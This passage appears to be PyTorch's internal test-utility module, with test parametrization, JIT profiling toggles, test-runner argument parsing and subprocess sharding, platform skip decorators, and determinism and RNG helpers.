def __init__(self, arg_values, name=None, decorators=None):
self.arg_values = arg_values
self.name = name
self.decorators = decorators if decorators else []
class parametrize(_TestParametrizer):
"""
Decorator for applying generic test parametrizations.
The interface for this decorator is modeled after `@pytest.mark.parametrize`.
Basic usage between this decorator and pytest's is identical. The first argument
should be a string containing comma-separated names of parameters for the test, and
the second argument should be an iterable returning values or tuples of values for
the case of multiple parameters.
Beyond this basic usage, the decorator provides some additional functionality that
pytest does not.
1. Parametrized tests end up as generated test functions on unittest test classes.
Since this differs from how pytest works, this decorator takes on the additional
responsibility of naming these test functions. The default test names consist of
the test's base name followed by each parameter name + value (e.g. "test_bar_x_1_y_foo"),
but custom names can be defined using `name_fn` or the `subtest` structure (see below).
2. The decorator specially handles parameter values of type `subtest`, which allows for
more fine-grained control over both test naming and test execution. In particular, it can
be used to tag subtests with explicit test names or apply arbitrary decorators (see examples
below).
Examples::
@parametrize("x", range(5))
def test_foo(self, x):
...
@parametrize("x,y", [(1, 'foo'), (2, 'bar'), (3, 'baz')])
def test_bar(self, x, y):
...
@parametrize("x,y", [(1, 'foo'), (2, 'bar'), (3, 'baz')],
name_fn=lambda x, y: '{}_{}'.format(x, y))
def test_bar_custom_names(self, x, y):
...
@parametrize("x, y", [subtest((1, 2), name='double'),
subtest((1, 3), name='triple', decorators=[unittest.expectedFailure]),
subtest((1, 4), name='quadruple')])
def test_baz(self, x, y):
...
Args:
arg_str (str): String of arg names separated by commas (e.g. "x,y").
arg_values (iterable): Iterable of arg values (e.g. range(10)) or
tuples of arg values (e.g. [(1, 2), (3, 4)]).
name_fn (callable): Optional function that takes in parameters and returns subtest name.
"""
def __init__(self, arg_str, arg_values, name_fn=None):
self.arg_names = arg_str.split(',')
self.arg_values = arg_values
self.name_fn = name_fn
def _formatted_str_repr(self, name, value):
""" Returns a string representation for the given arg that is suitable for use in test function names. """
if isinstance(value, torch.dtype):
return dtype_name(value)
elif isinstance(value, torch.device):
return str(value)
# Can't use isinstance as it would cause a circular import
elif value.__class__.__name__ == 'OpInfo' or value.__class__.__name__ == 'ModuleInfo':
return value.formatted_name
else:
# Include name and value separated by underscore.
return '{}_{}'.format(name, str(value).replace('.', '_'))
def _default_subtest_name(self, values):
return '_'.join([self._formatted_str_repr(a, v) for a, v in zip(self.arg_names, values)])
def _get_subtest_name(self, values, explicit_name=None):
if explicit_name:
subtest_name = explicit_name
elif self.name_fn:
subtest_name = self.name_fn(*values)
else:
subtest_name = self._default_subtest_name(values)
return subtest_name
def _parametrize_test(self, test, generic_cls, device_cls):
if len(self.arg_names) == 0:
# No additional parameters needed for the test.
test_name = ''
yield (test, test_name, {})
else:
# Each "values" item is expected to be either:
# * A tuple of values with one for each arg. For a single arg, a single item is expected.
# * A subtest instance with arg_values matching the previous.
for values in self.arg_values:
maybe_name = None
if isinstance(values, subtest):
sub = values
values = sub.arg_values
maybe_name = sub.name
# Apply decorators.
@wraps(test)
def test_wrapper(*args, **kwargs):
return test(*args, **kwargs)
for decorator in sub.decorators:
test_wrapper = decorator(test_wrapper)
gen_test = test_wrapper
else:
gen_test = test
values = list(values) if len(self.arg_names) > 1 else [values]
if len(values) != len(self.arg_names):
raise RuntimeError('Expected # values == # arg names, but got: {} '
'values and {} names for test "{}"'.format(
len(values), len(self.arg_names), test.__name__))
param_kwargs = {
name: value for name, value in zip(self.arg_names, values)
}
test_name = self._get_subtest_name(values, explicit_name=maybe_name)
if '.' in test_name:
raise RuntimeError('Test name cannot contain periods, but got: {}'.format(test_name))
yield (gen_test, test_name, param_kwargs)
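# A minimal sketch of how the helpers above compose (illustrative names only): stacking two
# parametrize decorators multiplies their parameter sets via compose_parametrize_fns(), and
# instantiate_parametrized_tests() then replaces the generic test with one concrete test per
# combination, named "<new_name>_<old_name>" as described above.
def _example_parametrized_tests():
    class ExampleTests(unittest.TestCase):
        @parametrize("x", [1, 2])
        @parametrize("y", ["a", "b"])
        def test_foo(self, x, y):
            assert x in (1, 2) and y in ("a", "b")

    instantiate_parametrized_tests(ExampleTests)
    # the generic test_foo is replaced by test_foo_x_1_y_a, test_foo_x_1_y_b,
    # test_foo_x_2_y_a and test_foo_x_2_y_b
    return sorted(name for name in dir(ExampleTests) if name.startswith("test_foo"))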
class ProfilingMode(Enum):
LEGACY = 1
SIMPLE = 2
PROFILING = 3
def cppProfilingFlagsToProfilingMode():
old_prof_exec_state = torch._C._jit_set_profiling_executor(True)
old_prof_mode_state = torch._C._jit_set_profiling_mode(True)
torch._C._jit_set_profiling_executor(old_prof_exec_state)
torch._C._jit_set_profiling_mode(old_prof_mode_state)
if old_prof_exec_state:
if old_prof_mode_state:
return ProfilingMode.PROFILING
else:
return ProfilingMode.SIMPLE
else:
return ProfilingMode.LEGACY
@contextmanager
def enable_profiling_mode_for_profiling_tests():
if GRAPH_EXECUTOR == ProfilingMode.PROFILING:
old_prof_exec_state = torch._C._jit_set_profiling_executor(True)
old_prof_mode_state = torch._C._jit_set_profiling_mode(True)
try:
yield
finally:
if GRAPH_EXECUTOR == ProfilingMode.PROFILING:
torch._C._jit_set_profiling_executor(old_prof_exec_state)
torch._C._jit_set_profiling_mode(old_prof_mode_state)
@contextmanager
def enable_profiling_mode():
old_prof_exec_state = torch._C._jit_set_profiling_executor(True)
old_prof_mode_state = torch._C._jit_set_profiling_mode(True)
try:
yield
finally:
torch._C._jit_set_profiling_executor(old_prof_exec_state)
torch._C._jit_set_profiling_mode(old_prof_mode_state)
@contextmanager
def num_profiled_runs(num_runs):
old_num_runs = torch._C._jit_set_num_profiled_runs(num_runs)
try:
yield
finally:
torch._C._jit_set_num_profiled_runs(old_num_runs)
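# A small sketch of the profiling-mode helpers above (illustrative function names): the
# context managers temporarily flip the JIT executor flags and restore them on exit.
def _example_num_profiled_runs():
    def add(x, y):
        return x + y
    # assumes TorchScript can compile this trivial function
    scripted = torch.jit.script(add)
    with num_profiled_runs(2):
        t = torch.ones(3)
        scripted(t, t)  # the first runs are profiled before the optimized plan is used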
func_call = torch._C.ScriptFunction.__call__
meth_call = torch._C.ScriptMethod.__call__
def prof_callable(callable, *args, **kwargs):
if 'profile_and_replay' in kwargs:
del kwargs['profile_and_replay']
if GRAPH_EXECUTOR == ProfilingMode.PROFILING:
with enable_profiling_mode_for_profiling_tests():
callable(*args, **kwargs)
return callable(*args, **kwargs)
return callable(*args, **kwargs)
def prof_func_call(*args, **kwargs):
return prof_callable(func_call, *args, **kwargs)
def prof_meth_call(*args, **kwargs):
return prof_callable(meth_call, *args, **kwargs)
# TODO fix when https://github.com/python/mypy/issues/2427 is addressed
torch._C.ScriptFunction.__call__ = prof_func_call # type: ignore[assignment]
torch._C.ScriptMethod.__call__ = prof_meth_call # type: ignore[assignment]
def _get_test_report_path():
# allow users to override the test file location. We need this
# because the distributed tests run the same test file multiple
# times with different configurations.
override = os.environ.get('TEST_REPORT_SOURCE_OVERRIDE')
test_source = override if override is not None else 'python-unittest'
return os.path.join('test-reports', test_source)
parser = argparse.ArgumentParser()
parser.add_argument('--subprocess', action='store_true',
help='whether to run each test in a subprocess')
parser.add_argument('--seed', type=int, default=1234)
parser.add_argument('--accept', action='store_true')
parser.add_argument('--jit_executor', type=str)
parser.add_argument('--repeat', type=int, default=1)
parser.add_argument('--test_bailouts', action='store_true')
parser.add_argument('--save-xml', nargs='?', type=str,
const=_get_test_report_path(),
default=_get_test_report_path() if IS_IN_CI else None)
parser.add_argument('--discover-tests', action='store_true')
parser.add_argument('--log-suffix', type=str, default="")
parser.add_argument('--run-parallel', type=int, default=1)
parser.add_argument('--import-slow-tests', type=str, nargs='?', const=SLOW_TESTS_FILE)
parser.add_argument('--import-disabled-tests', type=str, nargs='?', const=DISABLED_TESTS_FILE)
# Only run when -h or --help flag is active to display both unittest and parser help messages.
def run_unittest_help(argv):
unittest.main(argv=argv)
if '-h' in sys.argv or '--help' in sys.argv:
help_thread = threading.Thread(target=run_unittest_help, args=(sys.argv,))
help_thread.start()
help_thread.join()
args, remaining = parser.parse_known_args()
if args.jit_executor == 'legacy':
GRAPH_EXECUTOR = ProfilingMode.LEGACY
elif args.jit_executor == 'profiling':
GRAPH_EXECUTOR = ProfilingMode.PROFILING
elif args.jit_executor == 'simple':
GRAPH_EXECUTOR = ProfilingMode.SIMPLE
else:
# infer flags based on the default settings
GRAPH_EXECUTOR = cppProfilingFlagsToProfilingMode()
IMPORT_SLOW_TESTS = args.import_slow_tests
IMPORT_DISABLED_TESTS = args.import_disabled_tests
LOG_SUFFIX = args.log_suffix
RUN_PARALLEL = args.run_parallel
TEST_BAILOUTS = args.test_bailouts
TEST_DISCOVER = args.discover_tests
TEST_IN_SUBPROCESS = args.subprocess
TEST_SAVE_XML = args.save_xml
REPEAT_COUNT = args.repeat
SEED = args.seed
if not expecttest.ACCEPT:
expecttest.ACCEPT = args.accept
UNITTEST_ARGS = [sys.argv[0]] + remaining
torch.manual_seed(SEED)
# CI Prefix path used only on CI environment
CI_TEST_PREFIX = str(Path(os.getcwd()))
def wait_for_process(p):
try:
return p.wait()
except KeyboardInterrupt:
# Give `p` a chance to handle KeyboardInterrupt. Without this,
# `pytest` can't print errors it collected so far upon KeyboardInterrupt.
exit_status = p.wait(timeout=5)
if exit_status is not None:
return exit_status
else:
p.kill()
raise
except: # noqa: B001,E722, copied from python core library
p.kill()
raise
finally:
# Always call p.wait() to ensure exit
p.wait()
def shell(command, cwd=None, env=None):
sys.stdout.flush()
sys.stderr.flush()
# The following snippet is copied from the Py3 core library's subprocess.call,
# with only two changes:
# 1. an `except KeyboardInterrupt` block added for SIGINT handling.
# 2. In Py2, subprocess.Popen doesn't return a context manager, so we do
# `p.wait()` in a `finally` block to keep the code portable.
#
# https://github.com/python/cpython/blob/71b6c1af727fbe13525fb734568057d78cea33f3/Lib/subprocess.py#L309-L323
assert not isinstance(command, torch._six.string_classes), "Command to shell should be a list or tuple of tokens"
p = subprocess.Popen(command, universal_newlines=True, cwd=cwd, env=env)
return wait_for_process(p)
def discover_test_cases_recursively(suite_or_case):
if isinstance(suite_or_case, unittest.TestCase):
return [suite_or_case]
rc = []
for element in suite_or_case:
print(element)
rc.extend(discover_test_cases_recursively(element))
return rc
def get_test_names(test_cases):
return ['.'.join(case.id().split('.')[-2:]) for case in test_cases]
def _print_test_names():
suite = unittest.TestLoader().loadTestsFromModule(__main__)
test_cases = discover_test_cases_recursively(suite)
for name in get_test_names(test_cases):
print(name)
def chunk_list(lst, nchunks):
return [lst[i::nchunks] for i in range(nchunks)]
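# For example (illustrative): chunk_list(list(range(7)), 3) returns the round-robin shards
# [[0, 3, 6], [1, 4], [2, 5]].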
# sanitize filename e.g., distributed/pipeline/sync/skip/test_api.py -> distributed.pipeline.sync.skip.test_api
def sanitize_test_filename(filename):
# inspect.getfile returns absolute path in some CI jobs, converting it to relative path if needed
if filename.startswith(CI_TEST_PREFIX):
filename = filename[len(CI_TEST_PREFIX) + 1:]
strip_py = re.sub(r'.py$', '', filename)
return re.sub('/', r'.', strip_py)
def lint_test_case_extension(suite):
succeed = True
for test_case_or_suite in suite:
test_case = test_case_or_suite
if isinstance(test_case_or_suite, unittest.TestSuite):
first_test = test_case_or_suite._tests[0] if len(test_case_or_suite._tests) > 0 else None
if first_test is not None and isinstance(first_test, unittest.TestSuite):
return succeed and lint_test_case_extension(test_case_or_suite)
test_case = first_test
if test_case is not None:
test_class = test_case.id().split('.', 1)[1].split('.')[0]
if not isinstance(test_case, TestCase):
err = "This test class should extend from torch.testing._internal.common_utils.TestCase but it doesn't."
print(f"{test_class} - failed. {err}")
succeed = False
return succeed
def run_tests(argv=UNITTEST_ARGS):
# import test files.
if IMPORT_SLOW_TESTS:
if os.path.exists(IMPORT_SLOW_TESTS):
global slow_tests_dict
with open(IMPORT_SLOW_TESTS, 'r') as fp:
slow_tests_dict = json.load(fp)
else:
print(f'[WARNING] slow test file provided but not found: {IMPORT_SLOW_TESTS}')
if IMPORT_DISABLED_TESTS:
if os.path.exists(IMPORT_DISABLED_TESTS):
global disabled_tests_dict
with open(IMPORT_DISABLED_TESTS, 'r') as fp:
disabled_tests_dict = json.load(fp)
else:
print(f'[WARNING] disabled test file provided but not found: {IMPORT_DISABLED_TESTS}')
# Determine the test launch mechanism
if TEST_DISCOVER:
_print_test_names()
return
# Before running the tests, lint to check that every test class extends from TestCase
suite = unittest.TestLoader().loadTestsFromModule(__main__)
if not lint_test_case_extension(suite):
sys.exit(1)
if TEST_IN_SUBPROCESS:
failed_tests = []
test_cases = discover_test_cases_recursively(suite)
for case in test_cases:
test_case_full_name = case.id().split('.', 1)[1]
other_args = []
if IMPORT_DISABLED_TESTS:
other_args.append('--import-disabled-tests')
if IMPORT_SLOW_TESTS:
other_args.append('--import-slow-tests')
cmd = [sys.executable] + [argv[0]] + other_args + argv[1:] + [test_case_full_name]
string_cmd = " ".join(cmd)
exitcode = shell(cmd)
if exitcode != 0:
# This is sort of hacky, but add on relevant env variables for distributed tests.
if 'TestDistBackendWithSpawn' in test_case_full_name:
backend = os.environ.get("BACKEND", "")
world_size = os.environ.get("WORLD_SIZE", "")
env_prefix = f"BACKEND={backend} WORLD_SIZE={world_size}"
string_cmd = env_prefix + " " + string_cmd
# Log the command to reproduce the failure.
print(f"Test exited with non-zero exitcode {exitcode}. Command to reproduce: {string_cmd}")
failed_tests.append(test_case_full_name)
assert len(failed_tests) == 0, "{} unit test(s) failed:\n\t{}".format(
len(failed_tests), '\n\t'.join(failed_tests))
elif RUN_PARALLEL > 1:
test_cases = discover_test_cases_recursively(suite)
test_batches = chunk_list(get_test_names(test_cases), RUN_PARALLEL)
processes = []
for i in range(RUN_PARALLEL):
command = [sys.executable] + argv + ['--log-suffix=-shard-{}'.format(i + 1)] + test_batches[i]
processes.append(subprocess.Popen(command, universal_newlines=True))
failed = False
for p in processes:
failed |= wait_for_process(p) != 0
assert not failed, "Some test shards have failed"
elif TEST_SAVE_XML is not None:
# import here so that non-CI doesn't need xmlrunner installed
import xmlrunner # type: ignore[import]
test_filename = sanitize_test_filename(inspect.getfile(sys._getframe(1)))
test_report_path = TEST_SAVE_XML + LOG_SUFFIX
test_report_path = os.path.join(test_report_path, test_filename)
os.makedirs(test_report_path, exist_ok=True)
verbose = '--verbose' in argv or '-v' in argv
if verbose:
print('Test results will be stored in {}'.format(test_report_path))
unittest.main(argv=argv, testRunner=xmlrunner.XMLTestRunner(output=test_report_path, verbosity=2 if verbose else 1))
elif REPEAT_COUNT > 1:
for _ in range(REPEAT_COUNT):
if not unittest.main(exit=False, argv=argv).result.wasSuccessful():
sys.exit(-1)
else:
unittest.main(argv=argv)
IS_LINUX = sys.platform == "linux"
IS_WINDOWS = sys.platform == "win32"
IS_MACOS = sys.platform == "darwin"
IS_PPC = platform.machine() == "ppc64le"
def is_avx512_vnni_supported():
if sys.platform != 'linux':
return False
with open("/proc/cpuinfo", encoding="ascii") as f:
lines = f.read()
return "vnni" in lines
IS_AVX512_VNNI_SUPPORTED = is_avx512_vnni_supported()
if IS_WINDOWS:
@contextmanager
def TemporaryFileName(*args, **kwargs):
# Ideally we would like to not have to manually delete the file, but NamedTemporaryFile
# opens the file, and it cannot be opened multiple times in Windows. To support Windows,
# close the file after creation and try to remove it manually
if 'delete' in kwargs:
if kwargs['delete'] is not False:
raise UserWarning("only TemporaryFileName with delete=False is supported on Windows.")
else:
kwargs['delete'] = False
f = tempfile.NamedTemporaryFile(*args, **kwargs)
try:
f.close()
yield f.name
finally:
os.unlink(f.name)
else:
@contextmanager # noqa: T484
def TemporaryFileName(*args, **kwargs):
with tempfile.NamedTemporaryFile(*args, **kwargs) as f:
yield f.name
if IS_WINDOWS:
@contextmanager
def TemporaryDirectoryName(suffix=None):
# On Windows the directory created by TemporaryDirectory is likely to be removed prematurely,
# so we first create the directory using mkdtemp and then remove it manually
try:
dir_name = tempfile.mkdtemp(suffix=suffix)
yield dir_name
finally:
shutil.rmtree(dir_name)
else:
@contextmanager # noqa: T484
def TemporaryDirectoryName(suffix=None):
with tempfile.TemporaryDirectory(suffix=suffix) as d:
yield d
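# A minimal usage sketch of the two helpers above (illustrative): both yield a path string
# and clean up on exit, regardless of whether the Windows or POSIX variant was selected.
def _example_tmp_paths():
    with TemporaryFileName() as fname:
        torch.save(torch.ones(2), fname)
        loaded = torch.load(fname)
    with TemporaryDirectoryName() as dirname:
        torch.save(loaded, os.path.join(dirname, "tensor.pt"))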
IS_FILESYSTEM_UTF8_ENCODING = sys.getfilesystemencoding() == 'utf-8'
def _check_module_exists(name: str) -> bool:
r"""Returns if a top-level module with :attr:`name` exists *without**
importing it. This is generally safer than try-catch block around a
`import X`. It avoids third party libraries breaking assumptions of some of
our tests, e.g., setting multiprocessing start method when imported
(see librosa/#747, torchvision/#544).
"""
try:
import importlib.util
spec = importlib.util.find_spec(name)
return spec is not None
except ImportError:
return False
TEST_NUMPY = _check_module_exists('numpy')
TEST_SCIPY = _check_module_exists('scipy')
TEST_MKL = torch.backends.mkl.is_available()
TEST_NUMBA = _check_module_exists('numba')
TEST_DILL = _check_module_exists('dill')
TEST_LIBROSA = _check_module_exists('librosa')
BUILD_WITH_CAFFE2 = _check_module_exists("caffe2.python.caffe2_pybind11_state")
# Python 2.7 doesn't have spawn
NO_MULTIPROCESSING_SPAWN = os.environ.get('NO_MULTIPROCESSING_SPAWN', '0') == '1'
TEST_WITH_ASAN = os.getenv('PYTORCH_TEST_WITH_ASAN', '0') == '1'
TEST_WITH_DEV_DBG_ASAN = os.getenv('PYTORCH_TEST_WITH_DEV_DBG_ASAN', '0') == '1'
TEST_WITH_TSAN = os.getenv('PYTORCH_TEST_WITH_TSAN', '0') == '1'
TEST_WITH_UBSAN = os.getenv('PYTORCH_TEST_WITH_UBSAN', '0') == '1'
TEST_WITH_ROCM = os.getenv('PYTORCH_TEST_WITH_ROCM', '0') == '1'
# TODO: Remove PYTORCH_MIOPEN_SUGGEST_NHWC once ROCm officially supports NHWC in MIOpen
# See #64427
TEST_WITH_MIOPEN_SUGGEST_NHWC = os.getenv('PYTORCH_MIOPEN_SUGGEST_NHWC', '0') == '1'
# Enables tests that are slow to run (disabled by default)
TEST_WITH_SLOW = os.getenv('PYTORCH_TEST_WITH_SLOW', '0') == '1'
# Disables non-slow tests (these tests enabled by default)
# This is usually used in conjunction with TEST_WITH_SLOW to
# run *only* slow tests. (I could have done an enum, but
# it felt a little awkward.)
TEST_SKIP_FAST = os.getenv('PYTORCH_TEST_SKIP_FAST', '0') == '1'
# Disables noarch tests; all but one CI configuration disables these. We don't
# disable them for local runs because you still want to run them
# (unlike slow tests!)
TEST_SKIP_NOARCH = os.getenv('PYTORCH_TEST_SKIP_NOARCH', '0') == '1'
# Determine whether to enable cuda memory leak check.
# CUDA mem leak check is expensive and thus we don't want to execute it on every
# test case / configuration.
# If this is True then CUDA memory leak checks are skipped. If this is false
# then CUDA memory leak checks are performed.
# See: https://github.com/pytorch/pytorch/pull/59402#issuecomment-858811135
TEST_SKIP_CUDA_MEM_LEAK_CHECK = os.getenv('PYTORCH_TEST_SKIP_CUDA_MEM_LEAK_CHECK', '0') == '1'
# Disables tests for when on Github Actions
ON_GHA = os.getenv('GITHUB_ACTIONS', '0') == '1'
# True if CI is running TBB-enabled Pytorch
IS_TBB = "tbb" in os.getenv("BUILD_ENVIRONMENT", "")
# Dict of NumPy dtype -> torch dtype (when the correspondence exists)
numpy_to_torch_dtype_dict = {
np.bool_ : torch.bool,
np.uint8 : torch.uint8,
np.int8 : torch.int8,
np.int16 : torch.int16,
np.int32 : torch.int32,
np.int64 : torch.int64,
np.float16 : torch.float16,
np.float32 : torch.float32,
np.float64 : torch.float64,
np.complex64 : torch.complex64,
np.complex128 : torch.complex128
}
if IS_WINDOWS:
# Size of `np.intc` is platform defined.
# It is returned by functions like `bitwise_not`.
# On Windows `int` is 32-bit
# https://docs.microsoft.com/en-us/cpp/cpp/data-type-ranges?view=msvc-160
numpy_to_torch_dtype_dict[np.intc] = torch.int
# Dict of torch dtype -> NumPy dtype
torch_to_numpy_dtype_dict = {value : key for (key, value) in numpy_to_torch_dtype_dict.items()}
ALL_TENSORTYPES = [torch.float,
torch.double,
torch.half]
# bfloat16 bringup is currently only available on ROCm
# ALL_TENSORTYPES2 will eventually be unified with ALL_TENSORTYPES
# when bfloat16 bringup is complete on all platforms
if TEST_WITH_ROCM:
ALL_TENSORTYPES2 = [torch.float,
torch.double,
torch.half,
torch.bfloat16]
else:
ALL_TENSORTYPES2 = ALL_TENSORTYPES
def skipIfRocm(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if TEST_WITH_ROCM:
raise unittest.SkipTest("test doesn't currently work on the ROCm stack")
else:
fn(*args, **kwargs)
return wrapper
# Skips a test on CUDA if ROCm is unavailable or its version is lower than requested.
def skipIfRocmVersionLessThan(version=None):
def dec_fn(fn):
@wraps(fn)
def wrap_fn(self, *args, **kwargs):
if not TEST_WITH_ROCM:
reason = "ROCm not available"
raise unittest.SkipTest(reason)
rocm_version = str(torch.version.hip)
rocm_version = rocm_version.split("-")[0] # ignore git sha
rocm_version_tuple = tuple(int(x) for x in rocm_version.split("."))
if rocm_version_tuple is None or version is None or rocm_version_tuple < tuple(version):
reason = "ROCm {0} is available but {1} required".format(rocm_version_tuple, version)
raise unittest.SkipTest(reason)
return fn(self, *args, **kwargs)
return wrap_fn
return dec_fn
def skipIfNotMiopenSuggestNHWC(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if not TEST_WITH_MIOPEN_SUGGEST_NHWC:
raise unittest.SkipTest("test doesn't currently work without MIOpen NHWC activation")
else:
fn(*args, **kwargs)
return wrapper
# Context manager for setting deterministic flag and automatically
# resetting it to its original value
class DeterministicGuard:
def __init__(self, deterministic, *, warn_only=False):
self.deterministic = deterministic
self.warn_only = warn_only
def __enter__(self):
self.deterministic_restore = torch.are_deterministic_algorithms_enabled()
self.warn_only_restore = torch.is_deterministic_algorithms_warn_only_enabled()
torch.use_deterministic_algorithms(
self.deterministic,
warn_only=self.warn_only)
def __exit__(self, exception_type, exception_value, traceback):
torch.use_deterministic_algorithms(
self.deterministic_restore,
warn_only=self.warn_only_restore)
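# A minimal sketch of the guard above (illustrative function name): the flag is set inside
# the block and the previous value is restored on exit.
def _example_deterministic_guard():
    before = torch.are_deterministic_algorithms_enabled()
    with DeterministicGuard(True, warn_only=True):
        assert torch.are_deterministic_algorithms_enabled()
    assert torch.are_deterministic_algorithms_enabled() == before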
# Context manager for setting cuda sync debug mode and reset it
# to original value
# we are not exposing it to the core because sync debug mode is
# global and thus not thread safe
class CudaSyncGuard:
def __init__(self, sync_debug_mode):
self.mode = sync_debug_mode
def __enter__(self):
self.debug_mode_restore = torch.cuda.get_sync_debug_mode()
torch.cuda.set_sync_debug_mode(self.mode)
def __exit__(self, exception_type, exception_value, traceback):
torch.cuda.set_sync_debug_mode(self.debug_mode_restore)
# This decorator can be used for API tests that call
# torch.use_deterministic_algorithms(). When the test is finished, it will
# restore the previous deterministic flag setting.
#
# If CUDA >= 10.2, this will set the environment variable
# CUBLAS_WORKSPACE_CONFIG=:4096:8 so that the error associated with that
# setting is not thrown during the test unless the test changes that variable
# on purpose. The previous CUBLAS_WORKSPACE_CONFIG setting will also be
# restored once the test is finished.
#
# Note that if a test requires CUDA to actually register the changed
# CUBLAS_WORKSPACE_CONFIG variable, a new subprocess must be created, because
# CUDA only checks the variable when the runtime initializes. Tests can be
# run inside a subprocess like so:
#
# import subprocess, sys, os
# script = '''
# # Test code should go here
# '''
# try:
# subprocess.check_output(
# [sys.executable, '-c', script],
# stderr=subprocess.STDOUT,
# cwd=os.path.dirname(os.path.realpath(__file__)),
# env=os.environ.copy())
# except subprocess.CalledProcessError as e:
# error_message = e.output.decode('utf-8')
# # Handle exceptions raised by the subprocess here
#
def wrapDeterministicFlagAPITest(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
with DeterministicGuard(
torch.are_deterministic_algorithms_enabled(),
warn_only=torch.is_deterministic_algorithms_warn_only_enabled()):
class CuBLASConfigGuard:
cublas_var_name = 'CUBLAS_WORKSPACE_CONFIG'
def __enter__(self):
self.is_cuda10_2_or_higher = (
(torch.version.cuda is not None)
and ([int(x) for x in torch.version.cuda.split(".")] >= [10, 2]))
if self.is_cuda10_2_or_higher:
self.cublas_config_restore = os.environ.get(self.cublas_var_name)
os.environ[self.cublas_var_name] = ':4096:8'
def __exit__(self, exception_type, exception_value, traceback):
if self.is_cuda10_2_or_higher:
cur_cublas_config = os.environ.get(self.cublas_var_name)
if self.cublas_config_restore is None:
if cur_cublas_config is not None:
del os.environ[self.cublas_var_name]
else:
os.environ[self.cublas_var_name] = self.cublas_config_restore
with CuBLASConfigGuard():
fn(*args, **kwargs)
return wrapper
def skipIfCompiledWithoutNumpy(fn):
# Even if the numpy module is present, if `USE_NUMPY=0` is used during the
# build, numpy tests will fail
numpy_support = TEST_NUMPY
if numpy_support:
try:
# The numpy module is present, verify that PyTorch is compiled with
# numpy support
torch.from_numpy(np.array([2, 2]))
except RuntimeError:
numpy_support = False
@wraps(fn)
def wrapper(*args, **kwargs):
if not numpy_support:
raise unittest.SkipTest("PyTorch was compiled without numpy support")
else:
fn(*args, **kwargs)
return wrapper
def _test_function(fn, device):
def run_test_function(self):
return fn(self, device)
return run_test_function
def skipIfNoLapack(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if not torch._C.has_lapack:
raise unittest.SkipTest('PyTorch compiled without Lapack')
else:
fn(*args, **kwargs)
return wrapper
def skipIfNotRegistered(op_name, message):
"""Wraps the decorator to hide the import of the `core`.
Args:
op_name: Check if this op is registered in `core._REGISTERED_OPERATORS`.
message: message to fail with.
Usage:
@skipIfNotRegistered('MyOp', 'MyOp is not linked!')
This will check if 'MyOp' is in the caffe2.python.core
"""
if not BUILD_WITH_CAFFE2:
return unittest.skip("Pytorch is compiled without Caffe2")
try:
from caffe2.python import core
skipper = unittest.skipIf(op_name not in core._REGISTERED_OPERATORS,
message)
except ImportError:
skipper = unittest.skip("Cannot import `caffe2.python.core`")
return skipper
def skipIfNoSciPy(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if not TEST_SCIPY:
raise unittest.SkipTest("test require SciPy, but SciPy not found")
else:
fn(*args, **kwargs)
return wrapper
def skipIfOnGHA(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if ON_GHA:
raise unittest.SkipTest("Test disabled for GHA")
else:
fn(*args, **kwargs)
return wrapper
def skipIfTBB(message="This test makes TBB sad"):
def dec_fn(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if IS_TBB:
raise unittest.SkipTest(message)
else:
fn(*args, **kwargs)
return wrapper
return dec_fn
def slowTest(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if not TEST_WITH_SLOW:
raise unittest.SkipTest("test is slow; run with PYTORCH_TEST_WITH_SLOW to enable test")
else:
fn(*args, **kwargs)
wrapper.__dict__['slow_test'] = True
return wrapper
# noarch tests are tests that should be only run on one CI configuration,
# because they don't exercise any interesting platform specific code
# and so if run once, indicate the test should pass everywhere.
# See https://github.com/pytorch/pytorch/issues/53743
def noarchTest(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if TEST_SKIP_NOARCH:
raise unittest.SkipTest("test is noarch: we are skipping noarch tests due to TEST_SKIP_NOARCH")
else:
fn(*args, **kwargs)
return wrapper
def slowAwareTest(fn):
fn.__dict__['slow_test'] = True
return fn
def skipCUDAMemoryLeakCheckIf(condition):
def dec(fn):
if getattr(fn, '_do_cuda_memory_leak_check', True):  # if currently True
fn._do_cuda_memory_leak_check = not condition
return fn
return dec
def skipCUDANonDefaultStreamIf(condition):
def dec(fn):
if getattr(fn, '_do_cuda_non_default_stream', True):  # if currently True
fn._do_cuda_non_default_stream = not condition
return fn
return dec
def suppress_warnings(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
with warnings.catch_warnings():
warnings.simplefilter("ignore")
fn(*args, **kwargs)
return wrapper
def to_gpu(obj, type_map=None):
if type_map is None:
type_map = {}
if isinstance(obj, torch.Tensor):
assert obj.is_leaf
t = type_map.get(obj.dtype, obj.dtype)
with torch.no_grad():
res = obj.clone().to(dtype=t, device="cuda")
res.requires_grad = obj.requires_grad
return res
elif torch.is_storage(obj):
return obj.new().resize_(obj.size()).copy_(obj)
elif isinstance(obj, list):
return [to_gpu(o, type_map) for o in obj]
elif isinstance(obj, tuple):
return tuple(to_gpu(o, type_map) for o in obj)
else:
return deepcopy(obj)
def get_function_arglist(func):
return inspect.getfullargspec(func).args
def set_rng_seed(seed):
torch.manual_seed(seed)
random.seed(seed)
if TEST_NUMPY:
np.random.seed(seed)
@contextlib.contextmanager
def freeze_rng_state():
# no_dispatch needed for test_composite_compliance
# Some OpInfos use freeze_rng_state for rng determinism, but
# test_composite_compliance overrides dispatch for all torch functions
# which we need to disable to get and set rng state
with no_dispatch():
rng_state = torch.get_rng_state()
if torch.cuda.is_available():
cuda_rng_state = torch.cuda.get_rng_state()
try:
yield
finally:
with no_dispatch():
if torch.cuda.is_available():
torch.cuda.set_rng_state(cuda_rng_state)
torch.set_rng_state(rng_state)
@contextlib.contextmanager
def set_default_dtype(dtype):
saved_dtype = torch.get_default_dtype()
torch.set_default_dtype(dtype)
try:
yield
finally:
torch.set_default_dtype(saved_dtype)
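# A small sketch of set_default_dtype (illustrative): tensors constructed from Python floats
# inside the block use the requested default, and the old default is restored afterwards.
def _example_default_dtype():
    with set_default_dtype(torch.float64):
        assert torch.tensor([1.0]).dtype is torch.float64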
def iter_indices(tensor):
if tensor.dim() == 0:
return range(0)
if tensor.dim() == 1:
return range(tensor.size(0))
return product(*(range(s) for s in tensor.size()))
def is_iterable(obj):
try:
iter(obj)
return True
except TypeError:
return False
